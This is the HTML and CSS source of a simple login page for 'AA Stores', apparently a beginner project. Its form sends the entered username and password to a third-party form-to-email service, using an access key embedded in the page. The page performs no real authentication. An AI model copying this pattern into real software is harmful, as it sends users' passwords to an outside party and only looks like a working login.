    <!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Login Page</title>
    <style>
        form {
            border: 2px solid #fff;
            padding: 20px;
            width: 550px;
            max-width: 80%;
            box-shadow: 0 0 10px rgba(255, 255, 255, 0.5);
            border-radius: 8px;
        }

        input {
            text-shadow: 1px 1px 1px #000;
            font-size: larger;
            padding: 10px;
            margin: 10px;
            width: calc(100% - 20px);
            border: 1px solid #ccc;
            border-radius: 4px;
            box-sizing: border-box;
        }

        button {
            background-color: #000000;
            font-size: larger;
            padding: 12px;
            margin-top: 10px;
            border: none;
            border-radius: 4px;
            color: #fff;
            cursor: pointer;
            width: 100%;
        }

        h2 {
            font-family: serif;
            color: white;
            font-style: italic;
            font-size: xx-large;
            color: black;
        }

        body {
            background-color: black;
            background-image: url("IMAGES/image1.jpg");
            background-position: center;
            background-repeat: no-repeat;
            background-attachment: fixed;
            background-size: cover;
            margin: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
        }
        img{
            height: 150px;
        }
        .link{
color: white;
text-decoration: none;
        }
        .btn:hover,a:hover{
color: black;
background-color: #ffff;
        }
    </style>
</head>
<body>
    <center>
        <img src="IMAGES/AA  logo.png">
        <h2>Welcome to AA Stores <br> Log-in</h2>
        <form action="https://api.web3forms.com/submit" method="POST">
            <input type="hidden" name="access_key" value="c63ef06e-e808-4a95-bcb2-2b2c04b08dff">
            <input type="text" name="username" placeholder="Username" required><br><br>
            <input type="password" name="password" placeholder="Password" required><br><br>
            <input type="checkbox"  required>
            <label for="Terms" style="color: white;">Terms and conditions apply</label>
            
            <button class="btn" type="submit"><a class="link" href="Home page.html">Login</a></button>
      
        </form>
        
    </center>
</body>
</html>
